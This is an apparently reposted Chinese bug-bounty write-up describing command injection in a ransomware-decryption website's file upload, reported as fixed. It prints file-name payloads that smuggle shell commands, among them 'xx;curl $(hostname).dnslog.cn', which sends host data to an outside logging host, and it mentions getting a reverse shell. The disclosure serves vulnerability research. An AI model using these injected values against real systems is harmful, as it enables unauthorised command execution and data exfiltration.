SRC挖掘实战之某勒索病毒解密平台命令执行

admin 2023年5月10日03:17:22评论33 views字数 814阅读2分42秒阅读模式

注:漏洞已经上报厂商并且已完成修复。目标:https://lesuobingdu.xxx.cn/ 访问目标网站功能点居少,一般这种只有几个功能的单页很多人会忽略一些功能点SRC挖掘实战之某勒索病毒解密平台命令执行

分别测试查询和解密的功能,发现系统会将上传后的文件带入内部病毒库去查询,然后对比md5值或者识别文件内容来判断病毒再响应出解密的方案给用户SRC挖掘实战之某勒索病毒解密平台命令执行

那么可以设想当上传后的文件被带入系统内部查询会发生什么 大可能会出现

  • SQL注入
  • 命令注入
  • DOS服务
  • 让内部系统宕机等问题SRC挖掘实战之某勒索病毒解密平台命令执行

而且上传抓包的同时。如果系统允许Content-Type被恶意修改成test/html 或者某些可执行JavaScript的操作并且返回路径的 大几率出现XSS

命令注入验证:

一般黑盒测试只能通过oob外带数据 来测试响应内容 在Windows中文件可以重命名特殊字符,本地新建任意文件 重命名为:x;wget dnslog.cnSRC挖掘实战之某勒索病毒解密平台命令执行

1.第一次我是使用了ping命令去执行dnslog的,没有问题的 2.后续发现这样好像证明不了命令执行,执行相关高风险命令又怕被风控。3.当目标成功执行命令后,在User-Agent标头会回显出来当时执行的相关命令的版本号SRC挖掘实战之某勒索病毒解密平台命令执行

4.在目标网站测试,分别执行curl和wget回显版本号SRC挖掘实战之某勒索病毒解密平台命令执行SRC挖掘实战之某勒索病毒解密平台命令执行

在这里基本可以确认命令执行了,但是没办法证明带来的危害,还需要进一步利用 猜测执行不到whoami之类的命令 大概率是内部由waf或者某些字符在查询的时候冲突了

OOB数据外带的payload为:xxx;ping whoami.dnslog.cnSRC挖掘实战之某勒索病毒解密平台命令执行

本地测试是可以的,但是目标站无法外带,测试后发现在反引号中的命令才会生效

利用payload:xx;curl $(hostname).dnslog.cn

$()可以用做命令替换 相当于截取括号里面的命令 然后利用curl 传输$()内容到dnslog日志中SRC挖掘实战之某勒索病毒解密平台命令执行

最后即可完成命令执行,通过命令执行可以反弹shell


原文始发于微信公众号(M78安全团队):SRC挖掘实战之某勒索病毒解密平台命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月10日03:17:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SRC挖掘实战之某勒索病毒解密平台命令执行https://cn-sec.com/archives/1716924.html

发表评论

匿名网友 填写信息